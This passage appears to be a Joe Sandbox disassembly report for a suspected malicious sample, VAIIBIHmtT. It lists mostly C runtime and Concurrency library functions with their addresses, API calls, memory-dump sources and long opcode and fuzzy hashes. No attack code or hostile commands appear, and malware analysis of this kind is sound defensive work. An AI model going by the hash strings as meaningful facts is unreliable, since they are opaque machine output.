                                                        • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                        • Instruction ID: 5220afe54c2c4eb58e2bd6c7fe8d92cc3251fa7e029a8e69989a88eb0efc1355
                                                        • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                        • Instruction Fuzzy Hash: 0EF03070C00710DB8E216F14AC458053B60FF19772701526AF41A9B273DB78DA52EB9E
                                                        Function 0077291E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: T.exe$h|aE
                                                        • API String ID: 269201875-3952841194
                                                        • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                        • Instruction ID: a1b2d22f84b61f2b9660824ff14b5bc291d5b4bcd980a6775ab4d14c5395a19f
                                                        • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                        • Instruction Fuzzy Hash: FD01DB35241B00B7CE1627345C89D2B161DEBC17F5F398138F62CB2193EE6C9D074529
                                                        Function 00407F1F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040468C), ref: 00407F24
                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00407F34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                        • API String ID: 1646373207-3105848591
                                                        • Opcode ID: 34052d5efe30a951e29dc7ef0a2dbd152aac0a6d08b6cb6337df4798d7485599
                                                        • Instruction ID: 1d99bacaac1888824eefbdc766845a87ed9faa83661fb4ea910b66d5e56606b8
                                                        • Opcode Fuzzy Hash: 34052d5efe30a951e29dc7ef0a2dbd152aac0a6d08b6cb6337df4798d7485599
                                                        • Instruction Fuzzy Hash: AEF03070A44A0AD2DB005BA1FD0A76F7B79BB80742F9505A1E1D1F00E4DF7491B1D24A
                                                        Function 0078104A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_catchmake_shared
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3472968176-2084237596
                                                        • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                        • Instruction ID: 2b20f5923bdff95ada4fe9ee75892657e8bb087efc886f90bd521adfd48387a3
                                                        • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                        • Instruction Fuzzy Hash: 2BF04F70944118DFCB1ABB64C80A99C37A4BF46791F954492F8408F261C77C9D85CFA2
                                                        Function 004098F2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___addlocaleref.LIBCMT ref: 00409904
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(74DEDFA0), ref: 004097DC
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 004097E9
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 004097F6
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 00409803
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 00409810
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 0040982C
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 0040983C
                                                          • Part of subcall function 004097CA: InterlockedIncrement.KERNEL32(?), ref: 00409852
                                                        • ___removelocaleref.LIBCMT ref: 0040990F
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(74DEDFA0), ref: 00409873
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 00409880
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 0040988D
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 0040989A
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 004098A7
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 004098C3
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 004098D3
                                                          • Part of subcall function 00409859: InterlockedDecrement.KERNEL32(?), ref: 004098E9
                                                        • ___freetlocinfo.LIBCMT ref: 00409923
                                                          • Part of subcall function 00409681: ___free_lconv_mon.LIBCMT ref: 004096C7
                                                          • Part of subcall function 00409681: ___free_lconv_num.LIBCMT ref: 004096E8
                                                          • Part of subcall function 00409681: ___free_lc_time.LIBCMT ref: 0040976D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                        • String ID: zE
                                                        • API String ID: 467427115-928493823
                                                        • Opcode ID: f37a897659ffcb1763ae5d7e51d1f56e1a7d4690baae62ec8f074355503619e7
                                                        • Instruction ID: 7cc856bd8639580aa16bb3a00ab6d4e201576661b31e47b60cc3ce6e324e6266
                                                        • Opcode Fuzzy Hash: f37a897659ffcb1763ae5d7e51d1f56e1a7d4690baae62ec8f074355503619e7
                                                        • Instruction Fuzzy Hash: 3BE04FB791152145CA392519654066B92988F86715F2A067FF804B73D7DB3C8C8280DD
                                                        Function 00776258 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID:
                                                        • API String ID: 1036877536-0
                                                        • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                        • Instruction ID: d91979ccee1b5234b9ca8d3702eb5703507e300fc0eea204f20d6c9ea3355f4b
                                                        • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                        • Instruction Fuzzy Hash: D7A15B71A00B869FDF25CF28C8917AEBBE5EF11390F18816DD58D9B24AD63C8D41C751
                                                        Function 007738E9 Relevance: 6.3, APIs: 4, Instructions: 300COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                        • Instruction ID: f2de4e478da38eed9a7b3b9105d36654f685f7abf804afd562f50c47f867c1b8
                                                        • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                        • Instruction Fuzzy Hash: 16C119B0E04349EFDF11DFA8D845BAD7BB0AF09340F048199E959A7392D7389E41DB61
                                                        Function 00742AB6 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID:
                                                        • API String ID: 176396367-0
                                                        • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                        • Instruction ID: c6128086e7bce3abfc69b37961eefd8efb1a92a81bb1a608ecbabfba496da3dc
                                                        • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                        • Instruction Fuzzy Hash: B471ED72900218AFDB22DF64DD85FAEBBBCEF09711F0041A5B509E6155DA74AF81CF10
                                                        Function 0076979A Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007697B6
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007697CF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Value___vcrt_
                                                        • String ID:
                                                        • API String ID: 1426506684-0
                                                        • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                        • Instruction ID: c8a53a2d088ef73795a8bc756e69a72bcaf7e7896471fafd06d237fbde2459d1
                                                        • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                        • Instruction Fuzzy Hash: 91017032108712BEA7252BF47C8D95A274CEB07736730033AFE12A32E1EF294C01D949
                                                        Function 00769A89 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00769AA3
                                                          • Part of subcall function 007699F0: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00769A1F
                                                          • Part of subcall function 007699F0: ___AdjustPointer.LIBCMT ref: 00769A3A
                                                        • _UnwindNestedFrames.LIBCMT ref: 00769AB8
                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00769AC9
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00769AF1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                        • String ID:
                                                        • API String ID: 737400349-0
                                                        • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                        • Instruction ID: c53890394bc41ef9e6cc344c84461693783a5186978aa062d91ff9dd44933d75
                                                        • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                        • Instruction Fuzzy Hash: 49012932100108BBCF129E95CC45EEB7B7EEF98754F044118FE0966121D73AE861DBA1
                                                        Function 007632DB Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::location::_Assign.LIBCMT ref: 0076330A
                                                        • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00763328
                                                          • Part of subcall function 00758DE0: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00758E01
                                                          • Part of subcall function 00758DE0: Hash.LIBCMT ref: 00758E41
                                                        • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00763331
                                                        • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00763351
                                                          • Part of subcall function 0075FE38: Hash.LIBCMT ref: 0075FE4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                        • String ID:
                                                        • API String ID: 2250070497-0
                                                        • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                        • Instruction ID: f88c9f35d3eea1f1ca95881bcae94475074b37197c664467a9bf2eb8b6903887
                                                        • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                        • Instruction Fuzzy Hash: B7117077400604EFC715DF65C8869CAF7B8BF19320B044A1EE95687192DBB4F904CBA0
                                                        Function 00766AEE Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00766B08
                                                        • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00766B1C
                                                        • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00766B34
                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00766B4C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                        • String ID:
                                                        • API String ID: 78362717-0
                                                        • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                        • Instruction ID: 888f0c52df6649b87549f8201632ee6648e38c5904670cdbc318b25db6e1e084
                                                        • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                        • Instruction Fuzzy Hash: 46012672700114E7CF16AE58C855EEFB79EDF44310F500015FC1BEB281DA74ED0496A0
                                                        Function 00407DEA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                        • Instruction ID: 2e0e4ad26dcc27635e9bd2b21097cec5a41daebd3dcb00b3aba0b1c0a1580887
                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                        • Instruction Fuzzy Hash: 4D11993280504DBBCF125E94CC45CEE3F22BB18754B558466FE1865171C33AD971AB86
                                                        Function 007632EA Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::location::_Assign.LIBCMT ref: 0076330A
                                                        • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00763328
                                                          • Part of subcall function 00758DE0: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00758E01
                                                          • Part of subcall function 00758DE0: Hash.LIBCMT ref: 00758E41
                                                        • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00763331
                                                        • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00763351
                                                          • Part of subcall function 0075FE38: Hash.LIBCMT ref: 0075FE4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                        • String ID:
                                                        • API String ID: 2250070497-0
                                                        • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                        • Instruction ID: 4a5fd3d27fd725140b2f7fad6647b81a45050c3bb73a7380aa1bad8d2d29ad8a
                                                        • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                        • Instruction Fuzzy Hash: 11012D76500604EBC714DFA5C886DDAF7F8BF59320F008A1EE95687151DBB4F944CB60
                                                        Function 007462E4 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 007462EB
                                                          • Part of subcall function 0074C50C: __EH_prolog3_GS.LIBCMT ref: 0074C513
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00746336
                                                        • __Getcoll.LIBCPMT ref: 00746345
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00746355
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                        • String ID:
                                                        • API String ID: 1836011271-0
                                                        • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                        • Instruction ID: 675265807099055958471b67058c2418a52ad9e805a7537cd2dd79c45c754589
                                                        • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                        • Instruction Fuzzy Hash: 5F015E71911308EFEB14EFA4C449BDDB7B0BF45311F118429E445AB242DBBCA984CF91
                                                        Function 00745828 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 0074582F
                                                          • Part of subcall function 0074C50C: __EH_prolog3_GS.LIBCMT ref: 0074C513
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 0074587A
                                                        • __Getcoll.LIBCPMT ref: 00745889
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00745899
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                        • String ID:
                                                        • API String ID: 1836011271-0
                                                        • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                        • Instruction ID: cc1223093be63ba3643c0bbff72f7d358394261a578b2f8084347d95b8738a97
                                                        • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                        • Instruction Fuzzy Hash: 6E015E72D11608EFEB55EFA4C489BDDB7B4BF44311F108429E445AB242DBBCA984CF91
                                                        Function 0075C897 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0075C8C9
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0075C8D9
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0075C8E9
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0075C8FD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Compare_exchange_acquire_4std::_
                                                        • String ID:
                                                        • API String ID: 3973403980-0
                                                        • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                        • Instruction ID: 962d6758ff0b0e4446109da4b0b9c989521855cf8d7f379d8ce765fffa38358e
                                                        • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                        • Instruction Fuzzy Hash: E60169B600034DEFCF139E54DC43AED3B66AB05352B048411FD1894131C3BAEA79EB45
                                                        Function 0074DBE4 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00751A9B
                                                          • Part of subcall function 0075130D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0075132F
                                                          • Part of subcall function 0075130D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00751350
                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00751AAE
                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00751ABA
                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00751AC3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                        • String ID:
                                                        • API String ID: 4284812201-0
                                                        • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                        • Instruction ID: a3db9246558e1ce2736ca54ad5fbac8d8c6dd0ca5c4be583355c03b3f9906287
                                                        • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                        • Instruction Fuzzy Hash: 1BF02431641204EBCF04BA74086A7FE22854F80353F888168BD126B381DFFC8D0997D0
                                                        Function 0075D7CD Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0075D7E1
                                                        • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0075D805
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0075D818
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0075D826
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                        • String ID:
                                                        • API String ID: 3657713681-0
                                                        • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                        • Instruction ID: 07c2105e3f6bcb9bce8e11690b4226e5cf715299b5d579bfec6547b5b36252f7
                                                        • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                        • Instruction Fuzzy Hash: 54F05935900608E3C334FA54DC568DEB3799E84712370891EEC0253182DBFCBE0EC691
                                                        Function 0075D685 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0075D68F
                                                        • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0075D6C0
                                                        • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0075D6DC
                                                        • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0075D6E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Proxy::Scheduler$CoreDecrementResourceSubscription$CountCurrentDestroyExecutionFixedLevelManager::
                                                        • String ID:
                                                        • API String ID: 3725331629-0
                                                        • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                        • Instruction ID: 32a9ed6032c4d765b2963b3495f04e09e798ca6340a6a633e7ccf97f9ea75644
                                                        • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                        • Instruction Fuzzy Hash: ABF08236200900DB8639FF10E9148F673B6EFC4752310051CE94B06555CE69AA4ADB21
                                                        Function 007461C5 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Cnd_initX.LIBCPMT ref: 007461E1
                                                        • __Cnd_signal.LIBCPMT ref: 007461ED
                                                        • std::_Cnd_initX.LIBCPMT ref: 00746202
                                                        • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00746209
                                                        Memory Dump Source
